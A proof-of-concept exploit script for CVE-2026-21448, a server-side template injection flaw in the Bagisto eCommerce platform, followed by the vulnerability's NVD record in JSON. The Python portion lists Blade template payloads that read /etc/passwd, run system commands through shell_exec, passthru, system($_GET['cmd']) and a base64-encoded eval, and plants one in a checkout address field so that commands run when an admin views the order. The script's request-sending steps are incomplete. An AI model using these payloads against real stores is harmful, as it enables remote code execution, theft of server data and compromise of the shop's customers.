CVE-2026-21448

# CVE-2026-21448 Bagisto SSTI to RCE PoC # Affected Version: Bagisto < 2.3.10 import requests import json TARGET_URL = "http://target.com" # Replace with target URL # Step 1: Register a customer account and login session = requests.Session() # Login as customer (you need valid credentials) # login_url = f"{TARGET_URL}/customer/login" # session.post(login_url, data={'email': '[email protected]', 'password': 'password'}) # Step 2: Inject SSTI payload in address field during checkout # The payload tests for SSTI by evaluating template expression ssti_payload = "{{7*7}}" # Step 3: When admin views the order, the SSTI will be triggered # To confirm RCE, use a more dangerous payload: # RCE Payload examples for Blade template: # Read /etc/passwd: # {{file_get_contents('/etc/passwd')}} # Execute system command: # {{system('whoami')}} # Using Laravel's eval() or shell_exec(): # {{eval(base64_decode('c3lzdGVtKCJscyIpOw=='))}} # Base64 encoded: system("ls"); # Modern approach using _laravel_wrapper: # {{$_SERVER}} # Leak environment variables # Full exploitation example: malicious_payloads = [ # Basic SSTI test "{{7*7}}", # File read "{{file_get_contents('/etc/passwd')}}", # RCE via system() "{{system($_GET['cmd'])}}#", # RCE via shell_exec() "{{shell_exec('id')}}", # Using passthru() "{{passthru('cat /etc/hostname')}}", ] # Example: Add address with malicious payload address_data = { 'address1': malicious_payloads[2], # RCE payload 'address2': '', 'city': 'Test City', 'state': 'Test State', 'country': 'US', 'postal_code': '12345', } print("[+] CVE-2026-21448 Bagisto SSTI PoC") print("[+] Payload: {}".format(address_data['address1'])) print("[+] Note: This payload requires admin to view the order in admin panel") print("[+] After triggering, access: {}/?cmd=whoami".format(TARGET_URL))

{"cve": {"id": "CVE-2026-21448", "sourceIdentifier": "[email protected]", "published": "2026-01-02T21:15:59.053", "lastModified": "2026-01-08T21:22:34.810", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Bagisto is an open source laravel eCommerce platform. Versions prior to 2.3.10 are vulnerable to server-side template injection. When a normal customer orders any product, in the `add address` step they can inject a value to run in admin view. The issue can lead to remote code execution. Version 2.3.10 contains a patch."}, {"lang": "es", "value": "Bagisto es una plataforma de comercio electrónico laravel de código abierto. Las versiones anteriores a la 2.3.10 son vulnerables a la inyección de plantillas del lado del servidor. Cuando un cliente normal pide cualquier producto, en el paso 'añadir dirección' pueden inyectar un valor para ejecutar en la vista de administrador. El problema puede llevar a la ejecución remota de código. La versión 2.3.10 contiene un parche."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.9, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-1336"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:webkul:bagisto:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.3.10", "matchCriteriaId": "E9A19FD0-5100-48D6-BBB3-5A4CA1D90593"}]}]}], "references": [{"url": "https://github.com/bagisto/bagisto/security/advisories/GHSA-5j4h-4f72-qpm6", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}